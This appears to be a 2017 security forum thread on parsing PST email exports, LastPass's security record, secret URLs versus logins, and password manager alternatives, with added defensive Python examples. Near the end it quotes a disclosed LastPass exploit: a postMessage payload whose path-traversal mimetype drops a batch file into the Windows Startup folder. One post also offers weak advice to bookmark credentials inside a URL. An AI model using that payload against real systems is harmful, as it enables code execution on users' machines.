Diva Cupcake
Aug 15, 2005

Diametunim posted:

Anybody have tips for parsing PST files? I need to grab every email sent or received in an eight month time-span. Once I've done that I need to comb through the emails for certain keywords. I've tried using the built in advanced features in outlook but for some reason Outlook isn't returning all of the results. I'd like to do this programmatically but searching for python libraries that can parse PST files doesn't bring up much. Maybe this is a chance to export the PST and use one of the encase machines in my office.

Combing through people's emails is really boring.
Are you exporting to PST from Exchange or Outlook? If Exchange you can do so via the shell. Start it off something like...

# <alias>, <server> and <share> are placeholders; the cmdlet needs -Mailbox and a UNC -FilePath to run
New-MailboxExportRequest -Mailbox <alias> -ContentFilter {((Received -ge "10/01/2015") -and (Received -le "12/31/2015")) -or ((Sent -ge "10/01/2015") -and (Sent -le "12/31/2015"))} -FilePath "\\<server>\<share>\<alias>.pst"


Mr Chips
Jun 27, 2007
Whose arse do I have to blow smoke up to get rid of this baby?
It should be possible to knock up a quick powershell script to read the contents of a PST mounted in Outlook (there's a bunch of API classes and methods documented on MSDN for this sort of thing), but if it was me doing it I'd have to second the suggestion of using libpst+readpst

Mr Chips fucked around with this message at 11:10 on Mar 18, 2017
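
Putting the two suggestions together (get the mail out of the PST with readpst, then do the date window and keyword pass in Python, which is what Diametunim asked for), here is an added example; it is not code from either poster. It reads the mbox files that readpst writes by default, keeps messages dated inside a window, and reports the ones whose subject or text/plain body mention any of a keyword list. The mbox contents, the window and the keywords are constructed placeholders; the only dependency is the standard-library mailbox module.

```python
import mailbox
import os
import tempfile
from datetime import datetime, timezone
from email.message import Message
from email.utils import parsedate_to_datetime

# Constructed sample of what readpst writes: one mbox per PST folder. Three messages,
# two inside the Oct-Dec 2015 window, one of which mentions the keywords we care about.
SAMPLE_MBOX = b"""From MAILER-DAEMON Mon Oct  5 09:00:00 2015
From: alice@example.com
To: bob@example.com
Subject: Q4 budget
Date: Mon, 05 Oct 2015 09:00:00 +0000
Content-Type: text/plain; charset=utf-8

Please review the attached budget before the audit.

From MAILER-DAEMON Wed Nov 11 12:30:00 2015
From: dave@example.com
To: bob@example.com
Subject: hello
Date: Wed, 11 Nov 2015 12:30:00 +0000
Content-Type: text/plain; charset=utf-8

Nothing relevant here.

From MAILER-DAEMON Tue Jan  5 09:00:00 2016
From: carol@example.com
To: bob@example.com
Subject: lunch
Date: Tue, 05 Jan 2016 09:00:00 +0000
Content-Type: text/plain; charset=utf-8

Audit is done, lunch?
"""


def body_text(msg: Message) -> str:
    """Concatenate the text/plain parts; attachments and HTML parts are skipped."""
    chunks = []
    for part in msg.walk():
        if part.get_content_type() != "text/plain":
            continue
        payload = part.get_payload(decode=True) or b""
        chunks.append(payload.decode(part.get_content_charset() or "utf-8", errors="replace"))
    return "\n".join(chunks)


def message_date(msg: Message):
    """Parse the Date header to an aware datetime; None when missing or malformed."""
    raw = msg.get("Date")
    if not raw:
        return None
    try:
        dt = parsedate_to_datetime(raw)
    except (TypeError, ValueError):
        return None
    return dt if dt.tzinfo else dt.replace(tzinfo=timezone.utc)


def search_mbox(path, start, end, keywords):
    """Return (date, sender, subject, matched keywords) for every message dated within
    [start, end] whose subject or body contains any keyword (case-insensitive)."""
    wanted = [k.lower() for k in keywords]
    hits = []
    box = mailbox.mbox(path)
    try:
        for msg in box:
            dt = message_date(msg)
            if dt is None or not (start <= dt <= end):
                continue  # undated messages are dropped here; log them in a real review
            haystack = ((msg.get("Subject") or "") + "\n" + body_text(msg)).lower()
            matched = [k for k in wanted if k in haystack]
            if matched:
                hits.append((dt, msg.get("From", ""), msg.get("Subject", ""), matched))
    finally:
        box.close()
    return hits


def demo():
    """Write the constructed mbox to a temp dir and search it like a readpst output dir."""
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "Inbox.mbox")
        with open(path, "wb") as fh:
            fh.write(SAMPLE_MBOX)
        start = datetime(2015, 10, 1, tzinfo=timezone.utc)
        end = datetime(2015, 12, 31, 23, 59, 59, tzinfo=timezone.utc)
        return search_mbox(path, start, end, ["audit", "budget"])


if __name__ == "__main__":
    for dt, sender, subject, matched in demo():
        print(dt.isoformat(), sender, repr(subject), matched)
```

Point search_mbox at each file readpst produced (Inbox, Sent Items and so on) and union the hits; Sent Items is what covers the "sent" half of the question. Messages with no parseable Date header are skipped rather than guessed, so count them separately if completeness matters.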

Boris Galerkin
Dec 17, 2011

I don't understand why I can't harass people online. Seriously, somebody please explain why I shouldn't be allowed to stalk others on social media!
What is it about LastPass that makes it so bad? I use 1Password and I almost never hear about any earth shattering vulnerabilities but I don't know enough about them to know how they do things differently. Is it some kind of exposure thing? I'm not sure LastPass has an android app, and it was traditionally an OS X app and the lovely sluggish Windows version shows. More people using LastPass = more exploits found or is it something more fundamental like "those devs just don't know what they are doing?"

Khablam
Mar 29, 2012

Boris Galerkin posted:

What is it about LastPass that makes it so bad? I use 1Password and I almost never hear about any earth shattering vulnerabilities but I don't know enough about them to know how they do things differently. Is it some kind of exposure thing? I'm not sure LastPass has an android app, and it was traditionally an OS X app and the lovely sluggish Windows version shows. More people using LastPass = more exploits found or is it something more fundamental like "those devs just don't know what they are doing?"

Imagine if the most popular password manager (and ergo the biggest target) was also the one with the devs who don't know what they're doing: Lastpass

Three-Phase
Aug 5, 2006

by zen death robot

Sheep posted:

Are you sure it's an attachment and not an embedded image? That's often done so when the client loads the file they can track that someone (or something, but whatever) is checking the account, and then mark the address as a valid destination for future spam.

Edit: there are also random JPEG exploits like this that exist too, I guess.

100% sure it was an attachment. Using that to spread a JPEG exploit is possible but based on that CVE it only seems to work with certain software and much older OSes (Windows XP) but on the other hand I am sure throughout the world there are still tons of machines running poorly updated copies of Windows XP.

Scikar
Nov 20, 2005

5? Seriously?

Three-Phase posted:

100% sure it was an attachment. Using that to spread a JPEG exploit is possible but based on that CVE it only seems to work with certain software and much older OSes (Windows XP) but on the other hand I am sure throughout the world there are still tons of machines running poorly updated copies of Windows XP.

Barracuda spam filters got a mention recently because they don't scan emails above 256kB by default, on the basis that spammers don't send emails bigger than that but scanning large emails is more resource intensive. I'm sure a spammer using a botnet would be fairly happy to use up more of somebody else's bandwidth to get more emails through to inboxes though. So it might just be to add size to the email while using a file format that isn't suspicious itself.

Three-Phase
Aug 5, 2006

by zen death robot

Scikar posted:

Barracuda spam filters got a mention recently because they don't scan emails above 256kB by default, on the basis that spammers don't send emails bigger than that but scanning large emails is more resource intensive. I'm sure a spammer using a botnet would be fairly happy to use up more of somebody else's bandwidth to get more emails through to inboxes though. So it might just be to add size to the email while using a file format that isn't suspicious itself.

That's an interesting angle - the file size was about 200kB. The thing is there was no other content - no subject and no text. What's interesting is that at work (totally different account) there have been times where someone called me and requested something and in a rush I sent an email with no subject and no text, just an attachment (usually a picture of equipment or a reference document or whatnot).

But yeah if they have a server sending messages 200kb versus 20kb makes a big difference. But if it's coming from a compromised machine or email address it's a "don't care" situation and it makes sense that larger emails (with non-executable or archived or encrypted contents) may slip through.

Volmarias
Dec 31, 2002

EMAIL... THE INTERNET... SEARCH ENGINES...
Based on what I've seen before, I'd safely bet that the image attachment is solely to get around spam text scanning in low end anti spam endpoints. It's been around so long that I can't imagine it still working though.

Just ignore them.

Absurd Alhazred
Mar 27, 2010

by Athanatos
https://twitter.com/hacks4pancakes/status/843299108504948736

PBCrunch
Jun 17, 2002

Lawrence Phillips Always #1 to Me
Let's say I have a page with sensitive information on an Apache server. The server is running https-only and the sensitive information requires a login and password for access.

An iOS user is frustrated because Safari won't just store the login details, so the iOS user must enter the login information manually every time.

How much less secure is it to just make the resource accessible by entering an extremely long gibberish-filled URL? Let's ignore factors related to the iOS device, like losing the device or the device being compromised.

Subjunctive
Sep 12, 2006

✨sparkle and shine✨

PBCrunch posted:

How much less secure is it to just make the resource accessible by entering an extremely long gibberish-filled URL? Let's ignore factors related to the iOS device, like losing the device or the device being compromised.

One big issue with doing that is that the credential will be logged by proxies or Apache, which could inadvertently leak.

Why won't Safari save the login info? Will Chrome?
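
To make the logging point concrete, here is an added example (not from any post in the thread) that scans Apache combined-format lines for long, high-entropy path or query tokens, which is what a "gibberish URL" credential looks like once it is on disk. The log lines, the hostname and the entropy threshold are constructed. The basic-auth requests in the sample show only the %u username because Apache's default formats don't log the Authorization header; the secret-URL variant lands in the log in full, and a second time in the Referer of whatever the user clicks next.

```python
import math
import re
from collections import Counter

# Apache "combined" format: %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
LOG_RE = re.compile(
    r'^(\S+) \S+ (\S+) \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "([^"]*)" "([^"]*)"'
)

# Constructed lines: two basic-auth requests, then the same page reached through a
# secret-URL token, then a follow-on request whose Referer repeats that token.
SAMPLE_LOG = [
    '203.0.113.5 - - [22/Mar/2017:10:00:01 +0000] "GET /reports/q1 HTTP/1.1" 401 512 "-" "Safari/602"',
    '203.0.113.5 - pbc [22/Mar/2017:10:00:02 +0000] "GET /reports/q1 HTTP/1.1" 200 8192 "-" "Safari/602"',
    '203.0.113.5 - - [22/Mar/2017:10:05:09 +0000] "GET /s/9kQzX4vT7pL2mN8rW3hJ6cF1bY5dA0eG HTTP/1.1" 200 8192 "-" "Safari/602"',
    '203.0.113.5 - - [22/Mar/2017:10:05:30 +0000] "GET /help HTTP/1.1" 200 1024 "https://example.test/s/9kQzX4vT7pL2mN8rW3hJ6cF1bY5dA0eG" "Safari/602"',
]


def shannon_entropy(s: str) -> float:
    """Bits per character: English words land around 3, a long random base-62 token
    approaches log2(62), about 5.95."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def looks_like_secret(token: str, min_len: int = 24, min_entropy: float = 3.5) -> bool:
    """Heuristic: long and high-entropy. Thresholds are illustrative; tune on your own logs."""
    return len(token) >= min_len and shannon_entropy(token) >= min_entropy


def url_path(url: str) -> str:
    """Drop scheme and host so Referer values can be split like request targets."""
    if "://" in url:
        rest = url.split("://", 1)[1]
        slash = rest.find("/")
        return rest[slash:] if slash >= 0 else ""
    return url


def tokens(target: str):
    """Yield path segments and query-string values as candidate tokens."""
    path, _, query = target.partition("?")
    for seg in path.split("/"):
        if seg:
            yield seg
    for pair in query.split("&"):
        value = pair.partition("=")[2]
        if value:
            yield value


def scan(lines):
    """Flag request targets and Referer values that carry a probable secret token."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, _user, ts, _method, target, status, referer, _ua = m.groups()
        for where, value in (("request", target), ("referer", url_path(referer))):
            for tok in tokens(value):
                if looks_like_secret(tok):
                    findings.append({"client": client, "time": ts, "where": where,
                                     "token": tok, "status": status})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["time"], f["client"], f["where"], f["token"][:8] + "...", f["status"])
```

Run it over a real access_log and every hit is a copy of the credential that now lives in log rotation, backups and whatever ships logs off-box; the 401/200 pair from basic auth leaves nothing comparable behind.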

wolrah
May 8, 2006
what?
Why won't the iOS device save the credentials? I'd fix that rather than trying to make an obscured URL.

I'm betting the reason is a bogus SSL cert since that definitely makes Chrome not want to save passwords, in which case Let's Encrypt is the answer.

PBCrunch
Jun 17, 2002

Lawrence Phillips Always #1 to Me

wolrah posted:

Why won't the iOS device save the credentials? I'd fix that rather than trying to make an obscured URL.

I'm betting the reason is a bogus SSL cert since that definitely makes Chrome not want to save passwords, in which case Let's Encrypt is the answer.

I used Let's Encrypt. Chrome on my Android phone saves the password no problem, as do Chrome and Firefox on my desktop computer, but iOS refuses to do it. I get the nice green "Secure" lock when I visit the page in Chrome.

I have no experience with iOS, so I don't know what the cause is.

Rufus Ping
Dec 27, 2006





I'm a Friend of Rodney Nano
If you're using http basic auth get them to bookmark https://user:pass@whatever

Volmarias
Dec 31, 2002

EMAIL... THE INTERNET... SEARCH ENGINES...
Seriously, the answer here is to figure out the underlying issue and figure out if it's fixable.

I guess it's also a question of how sensitive this info is vs how hard it is to actually fix the problem vs how important the one user here is.

Furism
Feb 21, 2006

Live long and headbang

Khablam posted:

Imagine if the most popular password manager (and ergo the biggest target) was also the one with the devs who don't know what they're doing: Lastpass

Please explain.

Proteus Jones
Feb 28, 2013



Furism posted:

Please explain.

LastPass is a garbage fire of insecure coding practices, particularly in regards to the browser plugins. Tavis Ormandy keeps owning them over and over and over.

Dex
May 26, 2006

Quintuple x!!!

Would not escrow again.

VERY MISLEADING!
i think you're exaggerating a bit
https://twitter.com/taviso/status/843965519371812864

Lain Iwakura
Aug 5, 2004

The body exists only to verify one's own existence.

Taco Defender
I'd dig up my effort post that explains why fundamentally it is bad but Tavis' bug reports are good enough.

Absurd Alhazred
Mar 27, 2010

by Athanatos
Cutting edge stuff:

https://twitter.com/thezdi/status/842788469923442689

CLAM DOWN
Feb 13, 2007





Furism
Feb 21, 2006

Live long and headbang

flosofl posted:

LastPass is a garbage fire of insecure coding practices, particularly in regards to the browser plugins. Tavis Ormandy keeps owning them over and over and over.

Yeah, OK, but is it because he focuses on LastPass only or because LP is bad? This sounds like the whole "there are no viruses on Mac because it's a safe OS" from a few years ago just because nobody bothered to write any.

Thanks Ants
May 21, 2004

#essereFerrari


It can be both bad and only look worse than the competition due to the focus on it. Being poorly written isn't really a thing that is only true because people are trying to find problems with it.

As in, applying the same level of focus to all password managers might reveal them all to be complete poo poo, it isn't going to suddenly make LastPass secure.

Furism
Feb 21, 2006

Live long and headbang

Thanks Ants posted:

It can be both bad and only look worse than the competition due to the focus on it. Being poorly written isn't really a thing that is only true because people are trying to find problems with it.

As in, applying the same level of focus to all password managers might reveal them all to be complete poo poo, it isn't going to suddenly make LastPass secure.

Yes, and that isn't what I was implying. Sorry if I wasn't clear.

Do we know for a fact it's poorly written, or just that there are some flaws? I don't think it's quite the same.

I don't want to sound like I'm mindlessly defending LP. I'm just looking for the best password manager there is and if LP isn't that anymore then I want to understand why.

FlapYoJacks
Feb 12, 2009

Furism posted:

Yeah, OK, but is it because he focuses on LastPass only or because LP is bad? This sounds like the whole "there are no viruses on Mac because it's a safe OS" from a few years ago just because nobody bothered to write any.

Tavis focuses on all sorts of products that deal with "security." He's the John Wick of destroying security products. Mostly AV, but he's been on a LastPass kick recently. He also tore 1pass a new one earlier, but people seem to ignore that. :allears:

Khablam
Mar 29, 2012

Furism posted:

Do we know for a fact it's poorly written, or just that there are some flaws? I don't think it's quite the same.

Read the bug reports like suggested?
These aren't "a clever means was found to use X to do Y" but largely "basic common practices haven't been applied and I got the code to do something it wasn't meant to do in about 2mins of trying".

baka kaba
Jul 19, 2003

PLEASE ASK ME, THE SELF-PROFESSED NO #1 PAUL CATTERMOLE FAN IN THE SOMETHING AWFUL S-CLUB 7 MEGATHREAD, TO NAME A SINGLE SONG BY HIS EXCELLENT NU-METAL SIDE PROJECT, SKUA, AND IF I CAN'T PLEASE TELL ME TO
EAT SHIT

Furism posted:

Yes, and that isn't what I was implying. Sorry if I wasn't clear.

Do we know for a fact it's poorly written, or just that there are some flaws? I don't think it's quite the same.

I don't want to sound like I'm mindlessly defending LP. I'm just looking for the best password manager there is and if LP isn't that anymore then I want to understand why.

Nobody can really say how well written it is, it's not like they release the code, but this is the kind of thing where flaws are a big problem. So having any issues like these in a security product kinda makes it 'poorly written', in that it's failing to do what it sets out to do

The trouble with LastPass is it's really convenient - all your passwords are automatically in the :cloud:, the browser plugin handles getting and updating those passwords for you, it works some internet magic to automatically determine the right credentials and where they should be pasted on the page, and it all just runs within the browser with an extension that pops up its own UI. There's a lot to go wrong in there, and the exploits that have come out have hit all of these different aspects, from insecure password handling, to malicious websites impersonating another domain so the password is automatically filled in, to phishing scams where the extension's login UI pops up (but it's actually in another web page if you look real closely)

That and the fact it's so popular and centralised means it's a good target for people to attack - compromise their site and you can possibly get everything, spread an exploit around malicious pages/ads to grab a common site's credentials and you'll catch a decent chunk of LastPass users. That and the number of links in the chain make it inherently risky, so you have to trust they'll always be on top of things, but the exploits suggest they're not. Whether the convenience is worth it is up to you, but that's why it's not the 'best' password manager

Kassad
Nov 12, 2005

It's about time.
Speaking of basic common practices not being applied: Firefox gets complaint for labeling unencrypted login page insecure

quote:

Update: Around the same time this post was going live, participants of this Reddit thread claimed to hack the site using what's known as a SQL injection exploit. Multiple people claimed that passwords were stored in plaintext rather than the standard practice of using cryptographic hashes. A few minutes after the insecurity first came up in the online discussion, a user reported the database was deleted.

[...]

Update: As several commenters have pointed out, the site's subscription page transmits credit card information over plain-vanilla HTTP pages as well. The lack of protection is made worse by the assurance on the same page that: "All credit card information is encrypted using our Secure Transaction Server." Making matters worse still: the login page is returning error messages that indicate it may be vulnerable to SQL injection attacks.

Wiggly Wayne DDS
Sep 11, 2010



we've had multiple arguments about lastpass in this thread when their security failures come to light so let's get this over with

ratbert90 posted:

He also tore 1pass a new one earlier, but people seem to ignore that. :allears:
who's ignoring that? how developers deal with issues put forward to them and improve going forward should be your highest priority in deciding on a vendor. do you remember lastpass' servers were compromised?

note that compromise was june 2015 and their security guarantees on what an attacker can do with that information are absurdly inaccurate when compared to this november 2015 assessment. i've summarised that assessment before but for those who don't want to read the entire thing:

Wiggly Wayne DDS posted:

If your password manager, by default, has an unencrypted key stored (dOTP) that can be used to authenticate, obtain the encrypted vault key, decrypt the vault key, bypass IP restrictions, bypass 2FA and relies on local storage being impenetrable then you've got a bit of a design flaw. We've seen the damage in the past when Lastpass had an XSS problem that let an attacker grab any plaintext passwords from a vault silently. You're not storing your vault on a single system by virtue of using Lastpass so that is not the only possible angle of attack, and based on prior issues I can't comfortably advise people to use it for secure password storage. Especially given their response to the issues presented.

psydude
Apr 1, 2008

baka kaba posted:

Nobody can really say how well written it is, it's not like they release the code, but this is the kind of thing where flaws are a big problem. So having any issues like these in a security product kinda makes it 'poorly written', in that it's failing to do what it sets out to do

The trouble with LastPass is it's really convenient - all your passwords are automatically in the :cloud:, the browser plugin handles getting and updating those passwords for you, it works some internet magic to automatically determine the right credentials and where they should be pasted on the page, and it all just runs within the browser with an extension that pops up its own UI. There's a lot to go wrong in there, and the exploits that have come out have hit all of these different aspects, from insecure password handling, to malicious websites impersonating another domain so the password is automatically filled in, to phishing scams where the extension's login UI pops up (but it's actually in another web page if you look real closely)

That and the fact it's so popular and centralised means it's a good target for people to attack - compromise their site and you can possibly get everything, spread an exploit around malicious pages/ads to grab a common site's credentials and you'll catch a decent chunk of LastPass users. That and the number of links in the chain make it inherently risky, so you have to trust they'll always be on top of things, but the exploits suggest they're not. Whether the convenience is worth it is up to you, but that's why it's not the 'best' password manager

I mean I get that this opens up risks for the average person, but really it just sounds like the same old rules of common sense internet use still apply. Install uBlock, watch for phishing attacks, use OpenDNS when possible, etc. This is the case regardless as to whether or not you're using a password manager.

Khablam
Mar 29, 2012

psydude posted:

I mean I get that this opens up risks for the average person, but really it just sounds like the same old rules of common sense internet use still apply. Install uBlock, watch for phishing attacks, use OpenDNS when possible, etc. This is the case regardless as to whether or not you're using a password manager.

uBlock blacklists ads.
It doesn't audit the code of every wordpress blog you visit to check someone hasn't compromised it to use the LP exploit(s) against everyone visiting.
The solution is to not use lastpass, not decide "other things I do for other reasons make me safe".

It's honestly loving bizarre how far lastpass users will double-down on hand-waving the very very obvious issues it has, both in concept and execution of it.

psydude
Apr 1, 2008

Khablam posted:

uBlock blacklists ads.
It doesn't audit the code of every wordpress blog you visit to check someone hasn't compromised it to use the LP exploit(s) against everyone visiting.
The solution is to not use lastpass, not decide "other things I do for other reasons make me safe".

It's honestly loving bizarre how far lastpass users will double-down on hand-waving the very very obvious issues it has, both in concept and execution of it.

I'm not a lastpass user, nor am I doubling down on protecting it. I'm just saying that most of the stuff you mentioned, including XSS attacks, is going to be an issue regardless of whether or not you're using LastPass or really anything else. And yes, I'm aware that the exploits you're talking about are LP specific.

e: Hey here's an idea, how about some suggestions for alternatives? That's what the dude was asking for.

psydude fucked around with this message at 18:12 on Mar 21, 2017

Lain Iwakura
Aug 5, 2004

The body exists only to verify one's own existence.

Taco Defender

psydude posted:

I'm not a lastpass user, nor am I doubling down on protecting it. I'm just saying that most of the stuff you mentioned, including XSS attacks, is going to be an issue regardless of whether or not you're using last pass or really anything else. And yes, I'm aware that the exploits you're talking about are LP specific.

e: Hey here's an idea, how about some suggestions for alternatives? That's what the dude was asking for.

Free:
KeePass and Dropbox

Paid:
1Password

CLAM DOWN
Feb 13, 2007




OSI bean dip posted:

Free:
KeePass and cloud storage that isn't Dropbox

Fixed :colbert:

Lain Iwakura
Aug 5, 2004

The body exists only to verify one's own existence.

Taco Defender

It doesn't really matter in the end what your cloud storage option is provided you're securing the password database with a decent keyphrase and are using key files not stored in the cloud.
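
An added example, not KeePass code, of why the key file has to stay off the cloud share. It models the KeePass 2.x composite key (SHA-256 over SHA-256(password) followed by the key-file bytes), uses PBKDF2 as a stand-in for the real AES-KDF/Argon2 transform, and seals a fake header with an HMAC the way a .kdbx authenticates its header. It then plays the attacker who holds the synced database file and a wordlist: with a deliberately weak passphrase they win only if they also have the key file. Round count, wordlist and the header bytes are illustrative.

```python
import hashlib
import hmac
import os
from typing import Optional

HEADER_CHECK = b"demo-kdbx-header"  # stand-in for the header bytes a real KDBX authenticates


def composite_key(password: str, keyfile: Optional[bytes]) -> bytes:
    """KeePass 2.x style: SHA-256 of each component, then SHA-256 of the concatenation.
    KeePass takes a 32-byte key file as-is and hashes other formats; both are covered."""
    material = hashlib.sha256(password.encode("utf-8")).digest()
    if keyfile is not None:
        material += keyfile if len(keyfile) == 32 else hashlib.sha256(keyfile).digest()
    return hashlib.sha256(material).digest()


def transform_key(composite: bytes, salt: bytes, rounds: int) -> bytes:
    """Slow, salted transform. PBKDF2 here stands in for AES-KDF/Argon2 in a real .kdbx."""
    return hashlib.pbkdf2_hmac("sha256", composite, salt, rounds)


def create_db(password: str, keyfile: Optional[bytes], rounds: int = 20000) -> dict:
    """The parts of a database an attacker sees once it has synced: salt, rounds, check value."""
    salt = os.urandom(32)
    master = transform_key(composite_key(password, keyfile), salt, rounds)
    check = hmac.new(master, HEADER_CHECK, "sha256").digest()
    return {"salt": salt, "rounds": rounds, "check": check}


def try_open(db: dict, password: str, keyfile: Optional[bytes]) -> bool:
    """True when password (+ key file) reproduce the master key the database was sealed with."""
    master = transform_key(composite_key(password, keyfile), db["salt"], db["rounds"])
    return hmac.compare_digest(hmac.new(master, HEADER_CHECK, "sha256").digest(), db["check"])


def guess_passphrase(db: dict, candidates, keyfile: Optional[bytes]) -> Optional[str]:
    """Attacker model: they hold the synced database file and try a wordlist against it."""
    for cand in candidates:
        if try_open(db, cand, keyfile):
            return cand
    return None


def demo() -> dict:
    keyfile = os.urandom(32)  # generated on the laptop and never copied to the cloud folder
    db = create_db("correct horse", keyfile)  # weak, in-wordlist passphrase on purpose
    wordlist = ["password", "letmein", "correct horse", "hunter2"]  # constructed
    return {
        "owner_opens": try_open(db, "correct horse", keyfile),
        "guess_without_keyfile": guess_passphrase(db, wordlist, None),
        "guess_with_keyfile": guess_passphrase(db, wordlist, keyfile),
    }


if __name__ == "__main__":
    print(demo())
```

The key file adds 256 bits the wordlist can't reach, so a leaked or synced database only falls to a passphrase guess if the key file leaked with it; dropping the .key next to the .kdbx in the same Dropbox folder throws that away.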

CLAM DOWN
Feb 13, 2007




OSI bean dip posted:

It doesn't really matter in the end what your cloud storage option is provided you're securing the password database with a decent keyphrase and are using key files not stored in the cloud.

I know I just despise and distrust dropbox :(

Powered Descent
Jul 13, 2008

We haven't had that spirit here since 1969.

CLAM DOWN posted:

I know I just despise and distrust dropbox :(

Encryption works really well with Dropbox or other cloud storage, for exactly that reason. ecryptfs and encfs are pretty much made for this: set the Dropbox folder as the encrypted root, and mount the plaintext view wherever convenient. Then just work with your files normally via that plaintext view, and the encrypted backend gets updated transparently. Dropbox never sees anything that isn't scrambled to hell and back.

e: Granted, this isn't much use for a program like a password manager that's going to use Dropbox in its own way, not yours. This is just in general.

Wiggly Wayne DDS
Sep 11, 2010



lastpass vuln is up: https://bugs.chromium.org/p/project-zero/issues/detail?id=1209#c5

quote:

win = window.open("https://1min-ui-prod.service.lastpass.com/");
win.postMessage({fromExtension: false, cmd: "openattach", attachkey: "d44479a4ce97554c24399f651ca76899179dec81c854b38ef2389c3185ae8eec", data: "!8uK7g5j8Eq08Nr86mhmMxw==|1dSN0jXZSQ51V1ww9rk4DQ==", mimetype: "other:./../../../../../Start Menu/Programs/exploit.bat"}, "*");

quote:

LastPass responded and said they have NXDOMAIN'd 1min-ui-prod.service.lastpass.com while they investigate.

They also said they couldn't get my exploit to work, but I checked my apache access logs and they were using a Mac. Naturally, calc.exe will not appear on a Mac.

quote:

I've uploaded the exploit here:

https://lock.cmpxchg8b.com/SaiGhij5/lastpass.html

Lain Iwakura
Aug 5, 2004

The body exists only to verify one's own existence.

Taco Defender

quote:

They also said they couldn't get my exploit to work, but I checked my apache access logs and they were using a Mac. Naturally, calc.exe will not appear on a Mac.

Quality.


eames
May 9, 2009

quote:

They also said they couldn't get my exploit to work, but I checked my apache access logs and they were using a Mac. Naturally, calc.exe will not appear on a Mac.

:stonk:
